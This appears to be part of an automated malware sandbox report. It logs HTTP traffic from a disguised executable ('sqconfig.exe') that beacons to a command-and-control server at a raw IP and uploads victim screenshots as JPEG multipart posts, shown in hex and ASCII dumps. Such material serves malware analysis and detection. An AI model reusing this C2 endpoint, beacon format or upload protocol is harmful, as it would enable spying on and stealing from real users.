                                                                  Sep 30, 2021 23:53:28.227683067 CEST16328OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:28.227761030 CEST16330OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:28.227791071 CEST16341OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:53:28.422705889 CEST16375INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:28 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  112192.168.2.34993691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:28.348869085 CEST16373OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:28.534440041 CEST16375INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:28 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  113192.168.2.34993891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:28.754224062 CEST16377OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:28.754415035 CEST16378OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:28.754697084 CEST16388OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:28.755023956 CEST16390OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:28.878628969 CEST16395OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:28.878706932 CEST16397OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:28.878726006 CEST16400OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:28.878854036 CEST16403OUTData Raw: 60 29 db 6a 43 13 0e d4 98 a5 ca c7 cc 33 14 e0 29 71 4b 8a 76 15 c6 e2 94 0a 5c 53 b1 4e c2 b8 dc 51 8a 76 29 71 40 5c 6e 29 71 4e c5 28 15 56 26 e3 71 46 29 f8 a3 14 ec 2b 91 e2 93 6d 4d b6 93 6d 1c a3 e6 21 2b 48 56 a7 2b 4d 2b 53 ca 3e 62 be
                                                                  Data Ascii: `)jC3)qKv\SNQv)q@\n)qN(V&qF)+mMm!+HV+M+S>biJVR2iJWR2J\)L)PhS+M+VS+7E29ZaZHi9_ZaZR"I2S"Ch%%%;bS66:u[xZk[kIFq1L3)<O`V{r
                                                                  Sep 30, 2021 23:53:28.878968000 CEST16412OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:28.879106998 CEST16415OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:28.879174948 CEST16418OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:53:29.196898937 CEST16468INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:29 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  114192.168.2.34993991.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:28.764976978 CEST16391OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:28.956321955 CEST16418INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:28 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  115192.168.2.34994191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:29.195790052 CEST16468OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:29.372550964 CEST16470INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:29 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0
                                                                  Sep 30, 2021 23:53:29.387078047 CEST16470OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:29.387172937 CEST16470OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:29.387310028 CEST16480OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:29.387393951 CEST16483OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:29.513310909 CEST16489OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:29.513380051 CEST16496OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:53:29.513411045 CEST16510OUTData Raw: e5 0e 64 44 45 2e 2a 4d b4 6d a7 ca c3 98 8f 14 6d 07 b5 49 8a 36 d2 e5 0e 62 23 12 1f e1 a6 1b 74 3e a2 ac 6d a3 14 72 21 a9 b4 55 fb 37 a1 a6 fd 9d c7 4a b9 b4 d2 81 4b d9 a6 35 51 94 3c b6 1d 41 a4 e6 b4 71 4d 2a 0f 51 fa 52 f6 5d 86 aa 94 28
                                                                  Data Ascii: dDE.*MmmI6b#t>mr!U7JK5Q<AqM*QR](WL(}EOc8T"mtI!EN18i9.())bRS\P2@pKbbNbS)jMd)i1iZHJ)Mu2GZJ)::SEJ)
                                                                  Sep 30, 2021 23:53:29.638995886 CEST16513OUTData Raw: 00 15 1c 78 1a d3 de 4a f2 e7 3f 37 e3 5c 78 2f e1 4b d5 9f 47 5f 59 c7 d1 1e cb 37 1e 0f d2 3f dc 1f ca b1 cf 5a d8 b8 ff 00 91 4b 47 ff 00 ae 63 f9 56 3f 7a e4 c3 7c 2f d5 9a 63 3e 35 e8 80 7b d2 e0 51 4b 5d 27 1a 10 0a 7e 29 b4 a2 91 48 70 14
                                                                  Data Ascii: xJ?7\x/KG_Y7?ZKGcV?z|/c>5{QK]'~)Hpp)JK-N)sRhQMIxT2tT!Slhi1J%"Pi:phk~)?"=k~((|dUm#Cm<Bfo1}Xc9iZh7
                                                                  Sep 30, 2021 23:53:29.639168024 CEST16529OUTData Raw: 21 cc 8b f5 ae 1c 27 f0 5f ab 3e 8e af c6 bd 11 ec fa a7 1a 16 93 ff 00 5c 47 f2 ac 5e f5 b7 ab 71 a3 69 43 fe 98 8f e4 2b 0e b9 70 bf c3 fb ca c7 ff 00 1b ee 17 14 b8 34 99 a5 cd 74 9c 61 4f 14 ca 50 6a 46 89 29 69 a0 d2 f7 a4 5a 14 53 85 37 34
                                                                  Data Ascii: !'_>\G^qiC+p4taOPjF)iZS74H;((R!iT!HRLu0Z&* qR)C5C\T8u)yz5_7uCj-JP;Y0M&MsQQ(7xxt+2JQQo
                                                                  Sep 30, 2021 23:53:29.639216900 CEST16537OUTData Raw: ea cc 27 5f b7 c8 04 f6 69 63 28 50 17 7c 09 b4 2a 1c 0e db 57 9e a7 bf 53 54 85 2d 3f 67 17 ba 0f 69 25 b3 34 61 d7 f5 78 2e 3c e5 bb 47 26 da 3b 56 8e 58 23 92 27 8a 30 02 2b c6 ca 55 b1 81 8c 82 72 33 d7 9a 9e 2f 14 eb 70 de 49 76 2e 2d 5a 67
                                                                  Data Ascii: '_ic(P|*WST-?gi%4ax.<G&;VX#'0+Ur3/pIv.-Zg12X-!`tE=.;<#fv9,OROsV4FID0YX`A9vV7w5{{%Xm.p^&N[zZ#:YoltE{I-j]
                                                                  Sep 30, 2021 23:53:29.639236927 CEST16542OUTData Raw: 8a b5 4d 2d 83 9d b0 a5 a0 51 56 66 14 0a 28 ef 4c 05 a4 34 b4 86 80 0a 05 14 b4 00 52 d3 7b d2 d0 21 69 69 b4 a2 98 0b 45 14 50 21 45 14 51 4c 40 69 c2 9a 29 68 01 69 29 68 34 00 de f4 1a 5a 5c 50 02 51 45 14 00 53 a9 05 2d 31 05 28 a4 a2 81 0b
                                                                  Data Ascii: M-QVf(L4R{!iiEP!EQL@i)hi)h4Z\PQES-1(E%(Zhb;hi/RdQbQLFXQL&hE;QpdQNEZQMRsFhqJ%!LV)iZPiE4+KM3KIKLBfE-.iA
                                                                  Sep 30, 2021 23:53:29.841074944 CEST16560INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:29 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  116192.168.2.34994391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:29.628177881 CEST16510OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:29.822693110 CEST16560INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:29 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  117192.168.2.34994591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:30.078066111 CEST16561OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:30.275953054 CEST16577INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:30 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  118192.168.2.34994691.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:30.194271088 CEST16562OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:30.194578886 CEST16562OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:30.194917917 CEST16572OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:30.195169926 CEST16575OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:30.319092989 CEST16580OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:30.319195032 CEST16599OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:30.319300890 CEST16602OUTData Raw: df 3e 5c b8 f6 35 a1 8a 70 e3 bd 3f 69 35 b3 0f 67 07 ba 30 a5 f0 cc c3 94 60 d5 4e 4d 0e f2 31 fe a8 91 ed 5d 62 96 07 ad 4a 25 71 de ad 62 aa 2f 30 fa bc 1e cc e1 1e ca 78 fe f4 6c 3f 0a 8c a3 2f 63 5e 82 5d 58 7c f1 a9 fc 2a 36 b4 b2 9f ef c0
                                                                  Data Ascii: >\5p?i5g0`NM1]bJ%qb/0xl?/c^]X|*6ZktK7Y2z$l%Jifv#nS09*U**l:(VfgyQf*n=;WJZ+voWU%2#_;TPFye-'i"m RSWL'f
                                                                  Sep 30, 2021 23:53:30.443217039 CEST16605OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
